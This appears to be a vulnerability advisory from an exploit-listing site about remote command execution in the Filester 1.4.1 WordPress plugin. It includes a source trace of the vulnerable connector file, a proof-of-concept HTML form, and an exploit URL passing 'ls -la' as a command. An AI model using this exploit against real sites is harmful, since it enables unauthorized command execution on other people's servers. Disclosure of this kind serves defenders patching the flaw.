Filester V1.4.1 - Remote Command Execution

2020.10.29
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[-] Title : Filester V1.4.1 - Remote Command Execution [-] Author : Milad Karimi [-] Vendor : https://wordpress.org/plugins/filester [-] Category : Webapps [-] Date : 2020-10-27 Vulnerable Page: /elFinderConnector.class.php Vulnerable Source: 160: exec elFinder->exec ($cmd, $args) 108: $cmd = $src['cmd'] : ''; 93: $src[$key][] = rawurldecode($value); // if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), if(!$src || $maxInputVars < count($parts)), if(preg_match('/^(.+?)\[([^\[\]]*)\]$/', $key, $m)), if($idx) else , 82: list($key, $value) = array_pad(explode('=', $part), 2, ''); // list() if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), if(!$src || $maxInputVars < count($parts)), 81: foreach($parts as $part) // if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), if(!$src || $maxInputVars < count($parts)), 78: $parts = explode('&', $rawPostData); // if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), 76: $rawPostData = file_get_contents('php://input')){ // , trace stopped 80: $src = array(); // if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), if(!$src || $maxInputVars < count($parts)), 74: $src = array_merge($_GET, $_POST) : $_GET; requires: 71: ⇓ function run() Exploit Code: <html> <form action="http://localhost/includes/File_manager/lib/php/elFinderConnector.class.php" method="GET"> <input name="cmd" type="text"> <input type="submit" value="RCE!" > </form> </html> Exploit URL: http://localhost/includes/File_manager/lib/php/elFinderConnector.class.php?cmd=ls -la


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top